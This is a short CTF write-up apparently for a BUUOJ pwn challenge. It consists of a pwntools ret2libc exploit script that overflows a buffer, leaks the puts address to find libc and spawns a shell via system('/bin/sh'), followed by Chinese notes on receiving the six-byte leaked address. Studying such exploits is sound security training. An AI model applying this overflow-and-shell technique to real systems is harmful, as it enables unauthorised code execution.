from os import system
from pwn import*
context.log_level='debug'
p=remote('node4.buuoj.cn',25535)
libc_ = ELF('./libc-2.23.so')
elf = ELF('./2020')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
#p.recvuntil("Pull up your sword and tell me u story!")
#p.recv(3)
paylaod = 'a'*0x28 + p64(0x400733 )+p64(puts_got) + p64(puts_plt) + p64(0x4006ad)
p.sendline(paylaod)
p.recv()#this is important because of it ,the flag can be get
addr_=u64(p.recv(6).ljust(8,'\x00'))
#addr_=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
print(hex(addr_))
base_=addr_-libc_.symbols['puts']
system_=base_ + libc_.symbols['system']
bin_=base_+libc_.search('/bin/sh').next()
pay = 'a'*0x28 + p64(0x400733) +p64(bin_) + p64(system_)
#p.recv(3)
#p.recvuntil("Pull up your sword and tell me u story!")
p.sendline(pay)
p.interactive()
这里addr_=u64(p.recv(6).ljust(8,'\x00'))
这一句这个之所以这样写:我们首先来看接收到的write的地址,利用print(hex(addr_))
的两种结果:
1:
2:利用print((addr_))
的结果:
通过以上两种输出我们可以看到,这个选着接收6个字符是由地址的16进制形式,这里是:0x7f4cb1e36690数一下可以发现是6个字节
。
另外本题还需要注意的是利用context.log_level='debug'
时,再gdb里观察可以发现和远程程序交流的收、发数据情况,由此正确使用p.recv
语句。关于题目的思路其余师傅的wp讲的很清楚,正常解法。